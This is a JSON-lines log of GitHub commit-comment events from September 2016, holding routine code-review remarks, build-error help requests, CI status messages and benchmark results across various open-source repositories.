{"id":"4547903972","type":"CommitCommentEvent","actor":{"login":"tgil02"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":18981189,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2016-09-12T08:13:40Z","updated_at":"2016-09-12T08:13:40Z","body":"I am getting the following error, can someone please help me?\r\n![image](https://cloud.githubusercontent.com/assets/22136477/18420425/05e0e2b0-787b-11e6-847b-f5ce9bf0c0f0.png)\r\n"}},"created_at":"2016-09-12T08:13:40Z"}
{"id":"4547911857","type":"CommitCommentEvent","actor":{"login":"reza0901"},"repo":{"name":"reza0901/-"},"payload":{"comment":{"id":18981206,"position":null,"line":null,"path":null,"commit_id":"3b8d9435c429fe3ac22be2cb112d5ac9cbc9efbf","created_at":"2016-09-12T08:15:34Z","updated_at":"2016-09-12T08:15:34Z","body":"reza"}},"created_at":"2016-09-12T08:15:34Z"}
{"id":"4547913584","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18981212,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-12T08:16:00Z","updated_at":"2016-09-12T08:16:00Z","body":"卧槽！材质都被你干掉了啊"}},"created_at":"2016-09-12T08:16:00Z"}
{"id":"4547915151","type":"CommitCommentEvent","actor":{"login":"reza0901"},"repo":{"name":"reza0901/-"},"payload":{"comment":{"id":18981214,"position":null,"line":null,"path":null,"commit_id":"3b8d9435c429fe3ac22be2cb112d5ac9cbc9efbf","created_at":"2016-09-12T08:16:25Z","updated_at":"2016-09-12T08:16:25Z","body":"+  ./tg/bin/telegram-cli -k ./tg/tg-server.pub -s ./bot/bot.lua -l 1 -E $@"}},"created_at":"2016-09-12T08:16:25Z"}
{"id":"4547916643","type":"CommitCommentEvent","actor":{"login":"petterheterjag"},"repo":{"name":"petterheterjag/personal-site-react"},"payload":{"comment":{"id":18981216,"position":null,"line":null,"path":null,"commit_id":"312a1b637fba59bf0e24f7d050a07be96a651244","created_at":"2016-09-12T08:16:47Z","updated_at":"2016-09-12T08:16:47Z","body":"@ptz0n thanks :)"}},"created_at":"2016-09-12T08:16:47Z"}
{"id":"4547917546","type":"CommitCommentEvent","actor":{"login":"kzaher"},"repo":{"name":"ReactiveX/RxSwift"},"payload":{"comment":{"id":18981218,"position":null,"line":null,"path":null,"commit_id":"2e8736b137064101cd98ee01523e6229825cecce","created_at":"2016-09-12T08:17:01Z","updated_at":"2016-09-12T08:17:01Z","body":"We'll pack this into some repo inside RxSwiftCommunity when we find time. Hopefully soon.\r\n\r\nUntil then, one can just copy paste these 2 self contained files."}},"created_at":"2016-09-12T08:17:01Z"}
{"id":"4547921102","type":"CommitCommentEvent","actor":{"login":"wertklop"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":18981224,"position":20,"line":104,"path":"org.springframework.beans/src/main/java/org/springframework/beans/PropertyValue.java","commit_id":"ad492e906e4c9c994cad733d366ec9c30950ed92","created_at":"2016-09-12T08:17:53Z","updated_at":"2016-09-12T08:17:53Z","body":"why not `original.getSource();` ?"}},"created_at":"2016-09-12T08:17:53Z"}
{"id":"4547923678","type":"CommitCommentEvent","actor":{"login":"wweich"},"repo":{"name":"syncthing/syncthing"},"payload":{"comment":{"id":18981230,"position":null,"line":null,"path":null,"commit_id":"d8b5070ca8203b09c037fe40f2b5670cbe7101f3","created_at":"2016-09-12T08:18:32Z","updated_at":"2016-09-12T08:18:32Z","body":"You have a typo in the new ipv6 domain name (v4 vs. v6)."}},"created_at":"2016-09-12T08:18:32Z"}
{"id":"4547925749","type":"CommitCommentEvent","actor":{"login":"lp--"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18981233,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T08:19:04Z","updated_at":"2016-09-12T08:19:04Z","body":"@mcostalba:  Sure. Note, however, when you submit reverse test github is often not showing diff correctly.  When everything is in order it is offering to switch bases to show diff. I remember in the past I was submitting such test and people also did not understand what is going on.\r\nAnd in Ronald test which is running now I think master branch has one extra commit \"Reorder evaluation start\" (because it was updated in meantime) in comparison to move_pick branch. Not 100% sure as it is hard to track on github\r\n "}},"created_at":"2016-09-12T08:19:04Z"}
{"id":"4547926030","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18981235,"position":null,"line":null,"path":null,"commit_id":"45c7d55c46ae909c2c673c5247576e269ef6546d","created_at":"2016-09-12T08:19:09Z","updated_at":"2016-09-12T08:19:09Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WS-elSmeSWaZ18_wmqLkMA"}},"created_at":"2016-09-12T08:19:09Z"}
{"id":"4547928348","type":"CommitCommentEvent","actor":{"login":"Tarrasch"},"repo":{"name":"spotify/luigi"},"payload":{"comment":{"id":18981242,"position":58,"line":784,"path":"test/worker_test.py","commit_id":"c76284218b64e3784654eacd18d6deceb07825b7","created_at":"2016-09-12T08:19:45Z","updated_at":"2016-09-12T08:19:45Z","body":"Oh, such an improvement!! Thanks!"}},"created_at":"2016-09-12T08:19:45Z"}
{"id":"4547932510","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18981254,"position":null,"line":null,"path":null,"commit_id":"bb2f54a668db3ee71877f056ecda2849b1e63e28","created_at":"2016-09-12T08:20:47Z","updated_at":"2016-09-12T08:20:47Z","body":"UB sent this over after testing on OS X 10.10 (or so). It appears OS X is printing values to `stderr`, not `stdout`.\r\n\r\n```\r\nHAVE_ASAN: 1\r\nHAVE_UBSAN: 0\r\nHAVE_BOUNDS_SAN: 0\r\nHAVE_VALGRIND: 1\r\nHAVE_INTEL_MULTIARCH: 1\r\n./cryptest.sh: line 859: /1024/1024: syntax error: operand expected (error token is \"/1024/1024\")\r\n\r\nCPU:  logical\r\nFREQ: 01 GHz\r\nMEM:  MB\r\n```\r\n\r\nThis check-in may need some additional work if we start trying to format an error message like *\"no hw.cpufrequency found\"*."}},"created_at":"2016-09-12T08:20:47Z"}
{"id":"4547936748","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981266,"position":null,"line":null,"path":null,"commit_id":"d5900f58254e2458815631bca9ca5f06323c81d9","created_at":"2016-09-12T08:21:49Z","updated_at":"2016-09-12T08:21:49Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 234](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1190&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:26:07"}},"created_at":"2016-09-12T08:21:49Z"}
{"id":"4547936826","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981267,"position":null,"line":null,"path":null,"commit_id":"bae540fe9bc4dcd77b0ce46dbf6ef3d533486a97","created_at":"2016-09-12T08:21:50Z","updated_at":"2016-09-12T08:21:50Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 235](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1191&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T08:21:50Z"}
{"id":"4547938695","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18981275,"position":null,"line":null,"path":null,"commit_id":"5c4a68be6189a524bd1c437865f8aa2508ca6f5d","created_at":"2016-09-12T08:22:18Z","updated_at":"2016-09-12T08:22:18Z","body":"OK Igor eu desisto a rep é tua tens a faca e o queijo na mão tu lá sabes boa sorte para o teu trabalho não estou mais aqui para cobrir as tuas costas e defender-te. Não percebes a importância disto tudo para mim acabou..."}},"created_at":"2016-09-12T08:22:18Z"}
{"id":"4547940295","type":"CommitCommentEvent","actor":{"login":"TecSeguridad"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":18981280,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-12T08:22:45Z","updated_at":"2016-09-12T08:22:45Z","body":"Hi, i try to make compilation but was unable to finish because of this errors. Can you help me please?\r\n\r\n\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Building Traccar Web UI 0.12.2\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO]\r\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ traccar-web ---\r\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\r\n[INFO] Copying 31 resources\r\n[INFO] Copying 43 resources\r\n[INFO]\r\n[INFO] --- maven-compiler-plugin:3.3:compile (default-compile) @ traccar-web ---\r\n[INFO] Changes detected - recompiling the module!\r\n[INFO] Compiling 206 source files to /root/traccar-web/target/traccar-web-0.12.2/WEB-INF/classes\r\n[INFO] /root/traccar-web/src/main/java/org/traccar/web/shared/model/Period.java: Some input files use or override a deprecated API.\r\n[INFO] /root/traccar-web/src/main/java/org/traccar/web/shared/model/Period.java: Recompile with -Xlint:deprecation for details.\r\n[INFO] /root/traccar-web/src/main/java/org/traccar/web/client/view/DeviceView.java: Some input files use unchecked or unsafe operations.\r\n[INFO] /root/traccar-web/src/main/java/org/traccar/web/client/view/DeviceView.java: Recompile with -Xlint:unchecked for details.\r\n[INFO] -------------------------------------------------------------\r\n[ERROR] COMPILATION ERROR :\r\n[INFO] -------------------------------------------------------------\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[164,18] an enum switch case label must be the unqualified name of an enumeration constant\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[165,18] an enum switch case label must be the unqualified name of an enumeration constant\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[171,26] an enum switch case label must be the unqualified name of an enumeration constant\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[178,26] an enum switch case label must be the unqualified name of an enumeration constant\r\n[INFO] 4 errors\r\n[INFO] -------------------------------------------------------------\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] BUILD FAILURE\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Total time: 12.194s\r\n[INFO] Finished at: Mon Sep 12 04:18:34 EDT 2016\r\n[INFO] Final Memory: 26M/77M\r\n[INFO] ------------------------------------------------------------------------\r\n[ERROR] Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.3:compile (default-compile) on project traccar-web: Compilation failure: Compilation failure:\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[164,18] an enum switch case label must be the unqualified name of an enumeration constant\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[165,18] an enum switch case label must be the unqualified name of an enumeration constant\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[171,26] an enum switch case label must be the unqualified name of an enumeration constant\r\n[ERROR] /root/traccar-web/src/main/java/org/traccar/web/client/view/MapView.java:[178,26] an enum switch case label must be the unqualified name of an enumeration constant\r\n[ERROR] -> [Help 1]\r\n[ERROR]\r\n[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.\r\n[ERROR] Re-run Maven using the -X switch to enable full debug logging.\r\n[ERROR]\r\n[ERROR] For more information about the errors and possible solutions, please read the following articles:\r\n[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoFailureException\r\nroot@host:~/traccar-web#\r\n"}},"created_at":"2016-09-12T08:22:45Z"}
{"id":"4547940309","type":"CommitCommentEvent","actor":{"login":"paulgessinger"},"repo":{"name":"gessinger-hj/gepard-php"},"payload":{"comment":{"id":18981281,"position":14,"line":42,"path":"src/Event.php","commit_id":"9ec36afc06175d19c30787b0aa8dc3ddfbc7c8f3","created_at":"2016-09-12T08:22:45Z","updated_at":"2016-09-12T08:22:45Z","body":"@gessinger-hj Is this a good idea?"}},"created_at":"2016-09-12T08:22:45Z"}
{"id":"4547940555","type":"CommitCommentEvent","actor":{"login":"jindongh"},"repo":{"name":"wiredtiger/wiredtiger"},"payload":{"comment":{"id":18981282,"position":143,"line":143,"path":"test/java/com/wiredtiger/test/ConcurrentCloseTest.java","commit_id":"1ae0ab811fad080c197da3c0a73eb218226eb3f2","created_at":"2016-09-12T08:22:49Z","updated_at":"2016-09-12T08:22:49Z","body":"-143 Thread scanThread = new InsertThread(conn, i);\r\n+143 Thread scanThread = new ScanThread(conn, i);"}},"created_at":"2016-09-12T08:22:49Z"}
{"id":"4547945123","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18981293,"position":null,"line":null,"path":null,"commit_id":"5c4a68be6189a524bd1c437865f8aa2508ca6f5d","created_at":"2016-09-12T08:23:58Z","updated_at":"2016-09-12T08:23:58Z","body":"Vou encerrar este comentários"}},"created_at":"2016-09-12T08:23:58Z"}
{"id":"4547950203","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":18981310,"position":4,"line":21,"path":"common/zeroconf/zeroconf.cpp","commit_id":"18626329d7b8d2747307030af9fe15484ecf3e60","created_at":"2016-09-12T08:25:15Z","updated_at":"2016-09-12T08:25:15Z","body":"This will break windows compilation."}},"created_at":"2016-09-12T08:25:15Z"}
{"id":"4547955337","type":"CommitCommentEvent","actor":{"login":"krnrk"},"repo":{"name":"krnrk/repo"},"payload":{"comment":{"id":18981320,"position":3,"line":3,"path":"README.md","commit_id":"b567bba43c6767a91d00b6eeb0f5d3f46a9a09b7","created_at":"2016-09-12T08:26:29Z","updated_at":"2016-09-12T08:26:29Z","body":"proov"}},"created_at":"2016-09-12T08:26:29Z"}
{"id":"4547959803","type":"CommitCommentEvent","actor":{"login":"sbrunner"},"repo":{"name":"sbrunner/crdppf"},"payload":{"comment":{"id":18981330,"position":null,"line":null,"path":null,"commit_id":"18c71456dae8b936c7456973088d0da28a44361f","created_at":"2016-09-12T08:27:37Z","updated_at":"2016-09-12T08:27:37Z","body":"Excellent, thanks for the feedback :-)"}},"created_at":"2016-09-12T08:27:37Z"}
{"id":"4547963021","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/mountinfo-graph"},"payload":{"comment":{"id":18981336,"position":4,"line":9,"path":"read-file.go","commit_id":"7c2186a7a4101ce974acc7947a8d84f9424b30c8","created_at":"2016-09-12T08:28:25Z","updated_at":"2016-09-12T08:28:25Z","body":"Fix indentation"}},"created_at":"2016-09-12T08:28:25Z"}
{"id":"4547968039","type":"CommitCommentEvent","actor":{"login":"gessinger-hj"},"repo":{"name":"gessinger-hj/gepard-php"},"payload":{"comment":{"id":18981343,"position":14,"line":42,"path":"src/Event.php","commit_id":"9ec36afc06175d19c30787b0aa8dc3ddfbc7c8f3","created_at":"2016-09-12T08:29:40Z","updated_at":"2016-09-12T08:29:40Z","body":"Hi,\nja perfekt. ich habe die Änderung leichtfertig gemacht um das mit travis mal\nauszuprobieren.\nDas ist auch eine gute Idee.\nCHeck.\n\nOn Mon, Sep 12, 2016 at 10:22 AM, Paul Gessinger <notifications@github.com>\nwrote:\n\n> @gessinger-hj <https://github.com/gessinger-hj> Is this a good idea?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gessinger-hj/gepard-php/commit/9ec36afc06175d19c30787b0aa8dc3ddfbc7c8f3#commitcomment-18981281>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGc4J4Ve8YfJSKhsFbXYeUoSxQL6JCDYks5qpQvVgaJpZM4J6V0B>\n> .\n>\n"}},"created_at":"2016-09-12T08:29:40Z"}
{"id":"4547968440","type":"CommitCommentEvent","actor":{"login":"manz"},"repo":{"name":"WebGeoServices/traefik"},"payload":{"comment":{"id":18981344,"position":18,"line":18,"path":"middlewares/nragent.go","commit_id":"4c5f64e1ba1f01109f8e501f8e75f832954ebe4a","created_at":"2016-09-12T08:29:46Z","updated_at":"2016-09-12T08:29:46Z","body":"Error ignored :)"}},"created_at":"2016-09-12T08:29:46Z"}
{"id":"4547968659","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":18981345,"position":1,"line":1,"path":"examples/zeroconf/CMakeLists.txt","commit_id":"14ef2c2226d9fabd6d698300d3817330254f7d2f","created_at":"2016-09-12T08:29:49Z","updated_at":"2016-09-12T08:29:49Z","body":"This should be done in the test for zeroconf, because maybe this library is not found. Moreover, it is true for Unix and Windows, I guess only in OS X it is not required, but I guess that if one look for this library it would be found.\r\n\r\nI think the proper way to do that is `find_library(DNS_SD_LIBRARY dns_sd)` and if both this and the header are found, then zeroconf is enabled."}},"created_at":"2016-09-12T08:29:49Z"}
{"id":"4547972521","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":18981357,"position":4,"line":21,"path":"examples/zeroconf/targetadvertise.cpp","commit_id":"ce1c8e2972f39d5177167a08cf96f9391fe586b7","created_at":"2016-09-12T08:30:48Z","updated_at":"2016-09-12T08:30:48Z","body":"In general I include `<cstring>` rather than `<string.h>` in Aseba but it is a detail."}},"created_at":"2016-09-12T08:30:48Z"}
{"id":"4547974520","type":"CommitCommentEvent","actor":{"login":"joerg-krause"},"repo":{"name":"medoc92/libupnpp"},"payload":{"comment":{"id":18981362,"position":null,"line":null,"path":null,"commit_id":"90407dcc206987c8e58d61c64db539489f0717d2","created_at":"2016-09-12T08:31:16Z","updated_at":"2016-09-12T08:31:16Z","body":"Thanks for fixing!"}},"created_at":"2016-09-12T08:31:16Z"}
{"id":"4547978023","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/mountinfo-graph"},"payload":{"comment":{"id":18981368,"position":13,"line":31,"path":"read-file.go","commit_id":"7c2186a7a4101ce974acc7947a8d84f9424b30c8","created_at":"2016-09-12T08:32:07Z","updated_at":"2016-09-12T08:32:07Z","body":"Personally I try to avoid acronyms in the functions arguments. Not really important, though."}},"created_at":"2016-09-12T08:32:07Z"}
{"id":"4547980526","type":"CommitCommentEvent","actor":{"login":"dcousens"},"repo":{"name":"dcousens/dotfiles"},"payload":{"comment":{"id":18981372,"position":null,"line":null,"path":null,"commit_id":"4ca4b5118ed214ae27cfb2f731f34b94eba41a46","created_at":"2016-09-12T08:32:42Z","updated_at":"2016-09-12T08:32:42Z","body":"@fanatid aye? hahaha"}},"created_at":"2016-09-12T08:32:42Z"}
{"id":"4547982542","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18981377,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T08:33:11Z","updated_at":"2016-09-12T08:33:11Z","body":"I have edited wiki page:\r\n\r\nhttps://github.com/glinscott/fishtest/wiki/Creating-my-first-test\r\n\r\nTo add reverse simplification test. This is still a proposal, I am waiting for Joona and Gary confirmation before to proceed announcing it officially on the forum.\r\n\r\nI am not native speaker, so please if you find a better wording just let me know and I will update it.\r\n"}},"created_at":"2016-09-12T08:33:11Z"}
{"id":"4547982695","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18981378,"position":4,"line":4,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T08:33:13Z","updated_at":"2016-09-12T08:33:13Z","body":"`virtual-dom-stringify` should be moved out of this library [virtual-dom](https://github.com/Matt-Esch/virtual-dom) is intended to be the common standard for libraries to exchange DOM. Consumers of this library can, if they want, stringify it by themselves."}},"created_at":"2016-09-12T08:33:13Z"}
{"id":"4547985343","type":"CommitCommentEvent","actor":{"login":"davidjsherman"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":18981382,"position":1,"line":1,"path":"examples/zeroconf/CMakeLists.txt","commit_id":"14ef2c2226d9fabd6d698300d3817330254f7d2f","created_at":"2016-09-12T08:33:50Z","updated_at":"2016-09-12T08:33:50Z","body":"Need to check what is available in [Bonjour SDK for Windows](https://developer.apple.com/downloads/index.action?q=Bonjour%20SDK%20for%20Windows) aka\r\nhttp://adcdownload.apple.com/Developer_Tools/bonjour_sdk_for_windows_v3.0/bonjoursdksetup.exe"}},"created_at":"2016-09-12T08:33:50Z"}
{"id":"4547985855","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18981384,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T08:33:57Z","updated_at":"2016-09-12T08:33:57Z","body":"I'm not sure if it is sensible to make the Mercator projection the default."}},"created_at":"2016-09-12T08:33:57Z"}
{"id":"4547986395","type":"CommitCommentEvent","actor":{"login":"Turing1887"},"repo":{"name":"Turing1887/ProjektA"},"payload":{"comment":{"id":18981385,"position":null,"line":null,"path":null,"commit_id":"df9295f75ff2faaf8c81ac24ce6ef235b2aeaea9","created_at":"2016-09-12T08:34:07Z","updated_at":"2016-09-12T08:34:07Z","body":"### Anmerkung 2.0\r\nIch finde es außerdem äußerst suboptimal, dass ich 100 Stunden (mindestens, wenn nicht noch mehr) in dieses Projekt stecke und ich nicht mal annähernd fertig bin. Ich verstehe ihre Vorgehensweise und auch ihre Methodik, jedoch verstehe ich beim besten Willen nicht warum noch keiner annähernd bestanden hat. Ich sitze seit etwas mehr als 5 Monaten an ProjektA und auch wenn es mal Wochen gab in denen ich nichts gemacht habe so gab es genügend Wochen in denen ich 10+ Stunden damit verbracht habe. Und die meiste Zeit habe ich damit verbracht meine Projektidee umzuschreiben. Das kann es doch nicht sein. Das Projekt ist zu diesem Zeitpunkt nur noch frustrierend. Ich habe immer gewissenhaft gearbeitet und versucht so gut es geht ihre Vorgaben einzuhalten und dennoch bin ich meilenweit davon entfernt zu bestehen. "}},"created_at":"2016-09-12T08:34:07Z"}
{"id":"4547988584","type":"CommitCommentEvent","actor":{"login":"goetas"},"repo":{"name":"schmittjoh/serializer"},"payload":{"comment":{"id":18981390,"position":null,"line":null,"path":null,"commit_id":"774d4fc41d16b013e2e851596c4c697a663d4952","created_at":"2016-09-12T08:34:36Z","updated_at":"2016-09-12T08:34:36Z","body":"Yes, I checked before merging using `tests/benchmark.php` and there are no differences if groups are not used.\r\n\r\n\r\nI run again the benchmarks, and this are the results:\r\n\r\n*master*\r\n```\r\n$ php tests/benchmark.php json 10\r\nBenchmarking collection for format \"json\".\r\n{\"metrics\":{\"benchmark-collection-json\":0.26918060779572}}\r\n```\r\n\r\n*1.3.0*\r\n```\r\n$ php tests/benchmark.php json 10\r\nBenchmarking collection for format \"json\".\r\n{\"metrics\":{\"benchmark-collection-json\":0.26459178924561}}\r\n```\r\nEnabling some groups again there are no differences:\r\n```php\r\n    $context = SerializationContext::create()->setGroups(array(\r\n        'Default',\r\n        'post'\r\n    ));\r\n```\r\n\r\n\r\n*master*\r\n```\r\n$ php tests/benchmark.php json 10\r\nBenchmarking collection for format \"json\".\r\n{\"metrics\":{\"benchmark-collection-json\":0.039682507514954}}\r\n```\r\n\r\n*1.3.0*\r\n```\r\n$ php tests/benchmark.php json 10\r\nBenchmarking collection for format \"json\".\r\n{\"metrics\":{\"benchmark-collection-json\":0.0363037109375}}\r\n```\r\n\r\nBut to avoid mistakes in the future, what do you think if I enable the benchmark execution on Travis CI?\r\n\r\n"}},"created_at":"2016-09-12T08:34:36Z"}
{"id":"4547992151","type":"CommitCommentEvent","actor":{"login":"nighthawk"},"repo":{"name":"ReactiveX/RxSwift"},"payload":{"comment":{"id":18981398,"position":null,"line":null,"path":null,"commit_id":"2e8736b137064101cd98ee01523e6229825cecce","created_at":"2016-09-12T08:35:29Z","updated_at":"2016-09-12T08:35:29Z","body":"@kzaher, `RxImagePickerDelegateProxy.swift` also needs to get moved out of RxCocoa to fix #874"}},"created_at":"2016-09-12T08:35:29Z"}
{"id":"4547992631","type":"CommitCommentEvent","actor":{"login":"tporquet"},"repo":{"name":"ezpaarse-project/ezpaarse-logger"},"payload":{"comment":{"id":18981400,"position":null,"line":null,"path":null,"commit_id":"8cdbf06a699f16018170c4c7f20f4f8056197c32","created_at":"2016-09-12T08:35:36Z","updated_at":"2016-09-12T08:35:36Z","body":"nice!"}},"created_at":"2016-09-12T08:35:36Z"}
{"id":"4547998886","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":18981428,"position":1,"line":1,"path":"examples/zeroconf/CMakeLists.txt","commit_id":"14ef2c2226d9fabd6d698300d3817330254f7d2f","created_at":"2016-09-12T08:37:06Z","updated_at":"2016-09-12T08:37:06Z","body":"Yes, I did not install it but my guess is that they provide dns_sd as library. Unfortunately I'm now on the move with my Linux computer and my poor phone's internet connection."}},"created_at":"2016-09-12T08:37:06Z"}
{"id":"4548000343","type":"CommitCommentEvent","actor":{"login":"julienbourdeau"},"repo":{"name":"PrestaShop/docs"},"payload":{"comment":{"id":18981433,"position":null,"line":null,"path":null,"commit_id":"30d85d2d421b70f36e52eb6aa1938891bb5bbd5d","created_at":"2016-09-12T08:37:26Z","updated_at":"2016-09-12T08:37:26Z","body":"Oh yeah I remember, I'll work on that. Don't hesitate to make a proposal in a PR tho!"}},"created_at":"2016-09-12T08:37:26Z"}
{"id":"4548001912","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18981441,"position":null,"line":null,"path":null,"commit_id":"8deb2fdf54aac14be292772623d9cf44c5018a57","created_at":"2016-09-12T08:37:49Z","updated_at":"2016-09-12T08:37:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Fi64BUZ7&#x2F;1932-bug-995561-doc-osd-partition-guid-codes-need-clarification\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 995561 - [doc] OSD partition GUID codes need clarification</a>"}},"created_at":"2016-09-12T08:37:49Z"}
{"id":"4548002777","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18981446,"position":27,"line":27,"path":"package.json","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T08:38:00Z","updated_at":"2016-09-12T08:38:00Z","body":"Probably `node` `>=4` will also work. You can easily run tests by specifying Node 4 in `.travis.yml`:\r\n\r\n```yaml\r\nnode_js:\r\n  - 'stable'\r\n  - '6' \r\n  - '4' \r\n```"}},"created_at":"2016-09-12T08:38:00Z"}
{"id":"4548003535","type":"CommitCommentEvent","actor":{"login":"lmartinet"},"repo":{"name":"lmartinet/ISTEX_MentalRotation"},"payload":{"comment":{"id":18981449,"position":40,"line":82,"path":"IstexDoc2Vec.py","commit_id":"1d9d2704f5f94561b82e684d24f51188ac27018d","created_at":"2016-09-12T08:38:12Z","updated_at":"2016-09-12T08:38:12Z","body":"I would replace the line by subdir = os.path.join(wiki, sub) ;\r\nThis way, no constraint for the user to add \"/\" when giving the name of the wiki directory."}},"created_at":"2016-09-12T08:38:12Z"}
{"id":"4548006772","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/ports"},"payload":{"comment":{"id":18981460,"position":71,"line":71,"path":"opnsense/opnsense-pam-auth/opnsense-auth","commit_id":"1825f6f680bf3259a0bd5f25dc6ad7d24c3d1b9c","created_at":"2016-09-12T08:38:57Z","updated_at":"2016-09-12T08:38:57Z","body":"@fabianfrz will do, thanks!"}},"created_at":"2016-09-12T08:38:57Z"}
{"id":"4548009238","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18981464,"position":29,"line":29,"path":"package.json","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T08:39:34Z","updated_at":"2016-09-12T08:39:34Z","body":"Looks like the license in `LICENSE` is the [ISC license](https://opensource.org/licenses/ISC)."}},"created_at":"2016-09-12T08:39:34Z"}
{"id":"4548011288","type":"CommitCommentEvent","actor":{"login":"tomskii"},"repo":{"name":"tomskii/rt-country-selector"},"payload":{"comment":{"id":18981469,"position":null,"line":null,"path":null,"commit_id":"e146acc9fbf3db086c50f0b04414f21541060940","created_at":"2016-09-12T08:40:04Z","updated_at":"2016-09-12T08:40:04Z","body":"[service-name.txt](https://github.com/tomskii/rt-country-selector/files/466882/service-name.txt)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-12T08:40:04Z"}
